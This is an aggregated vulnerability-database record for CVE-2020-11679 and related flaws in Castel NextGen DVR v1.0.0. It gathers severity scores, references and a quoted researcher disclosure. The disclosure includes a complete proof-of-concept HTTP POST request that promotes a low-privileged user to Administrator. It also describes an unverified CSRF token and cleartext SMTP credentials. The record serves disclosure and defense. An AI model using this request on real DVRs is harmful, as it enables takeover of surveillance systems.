ID

VAR-202006-0042


CVE

CVE-2020-11679


TITLE

Castel NextGen DVR Vulnerability related to authority management in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006190

DESCRIPTION

Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account.

Castel NextGen DVR contains a privilege management vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS).

The Castel NextGen DVR management function has security vulnerabilities that allow remote attackers to submit special requests, elevate permissions, and obtain administrator permissions.

All issues are associated with Castel NextGen DVR v1.0.0 and have been resolved in v1.0.1.

-------------------------------
CVE-2020-11679 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role:

    POST /Administration/Users/Edit/:ID HTTP/1.1
    Host: $RHOST
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: $REVIEWER_COOKIES
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 349

    UserId=:ID&Email=bypass%40test.com
    &FirstName=bypass&LastName=bypass&LDAPUser=false
    &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false
    &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false
    &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false
    &Locked=false

-------------------------------
CVE-2020-11680 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET, however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user.

-------------------------------
CVE-2020-11681 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>

Original Disclosure
https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Description
Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised.

-------------------------------
CVE-2020-11682 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>

Original Disclosure
https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

Description
The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed.

AARON BISHOP | Principal Penetration Tester
CISSP, OSCP, OSWE

Trust: 2.34

sources: NVD: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // PACKETSTORM: 157954

IOT TAXONOMY

category: ['IoT'], sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-24898

AFFECTED PRODUCTS

vendor: castel, model: nextgen dvr, scope: eq, version: 1.0.0

Trust: 2.4

sources: CNVD: CNVD-2021-24898 // JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-11679
value: HIGH

Trust: 1.0

NVD: JVNDB-2020-006190
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-24898
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202006-501
value: HIGH

Trust: 0.6

VULMON: CVE-2020-11679
value: MEDIUM

Trust: 0.1

NVD:
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: JVNDB-2020-006190
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-24898
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULMON: CVE-2020-11679
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

NVD:
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-006190
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679 // CNNVD: CNNVD-202006-501

PROBLEMTYPE DATA

problemtype:CWE-862

Trust: 1.0

problemtype:CWE-269

Trust: 0.8

sources: JVNDB: JVNDB-2020-006190 // NVD: CVE-2020-11679

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202006-501

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202006-501

CONFIGURATIONS

sources: NVD: CVE-2020-11679

PATCH

title: Digital Video Recorder (DVR), url: http://castle-cctv.kr/digital-video-recorder-dvr/

Trust: 0.8

title: Patch for Castel NextGen DVR management function privilege escalation vulnerability, url: https://www.cnvd.org.cn/patchinfo/show/255911

Trust: 0.6

title: Castel NextGen DVR Security vulnerabilities, url: http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121159

Trust: 0.6

title: CVEs, url: https://github.com/irbishop/cves

Trust: 0.1

title: CVEs, url: https://github.com/irbishop/cve

Trust: 0.1

sources: CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // CNNVD: CNNVD-202006-501

EXTERNAL IDS

db: NVD, id: CVE-2020-11679

Trust: 3.2

db: PACKETSTORM, id: 157954

Trust: 3.2

db: JVNDB, id: JVNDB-2020-006190

Trust: 0.8

db: CNVD, id: CNVD-2021-24898

Trust: 0.6

db: CNNVD, id: CNNVD-202006-501

Trust: 0.6

db: VULMON, id: CVE-2020-11679

Trust: 0.1

sources: CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // PACKETSTORM: 157954 // NVD: CVE-2020-11679 // CNNVD: CNNVD-202006-501

REFERENCES

url:http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html

Trust: 3.7

url:https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass

Trust: 1.8

url:http://seclists.org/fulldisclosure/2020/jun/8

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2020-11679

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/862.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/irbishop/cves

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-11680

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681

Trust: 0.1

url:https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-11681

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-11682

Trust: 0.1

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682

Trust: 0.1

sources: CNVD: CNVD-2021-24898 // VULMON: CVE-2020-11679 // JVNDB: JVNDB-2020-006190 // PACKETSTORM: 157954 // NVD: CVE-2020-11679 // CNNVD: CNNVD-202006-501

CREDITS

Aaron Bishop

Trust: 0.7

sources: PACKETSTORM: 157954 // CNNVD: CNNVD-202006-501

SOURCES

db: CNVD, id: CNVD-2021-24898
db: VULMON, id: CVE-2020-11679
db: JVNDB, id: JVNDB-2020-006190
db: PACKETSTORM, id: 157954
db: NVD, id: CVE-2020-11679
db: CNNVD, id: CNNVD-202006-501

LAST UPDATE DATE

2023-12-18T12:27:28.739000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2021-24898, date: 2021-04-06T00:00:00
db: VULMON, id: CVE-2020-11679, date: 2021-07-21T00:00:00
db: JVNDB, id: JVNDB-2020-006190, date: 2020-07-02T00:00:00
db: NVD, id: CVE-2020-11679, date: 2021-07-21T11:39:23.747
db: CNNVD, id: CNNVD-202006-501, date: 2021-01-04T00:00:00

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2021-24898, date: 2021-04-04T00:00:00
db: VULMON, id: CVE-2020-11679, date: 2020-06-04T00:00:00
db: JVNDB, id: JVNDB-2020-006190, date: 2020-07-02T00:00:00
db: PACKETSTORM, id: 157954, date: 2020-06-05T18:19:24
db: NVD, id: CVE-2020-11679, date: 2020-06-04T19:15:12.693
db: CNNVD, id: CNNVD-202006-501, date: 2020-06-04T00:00:00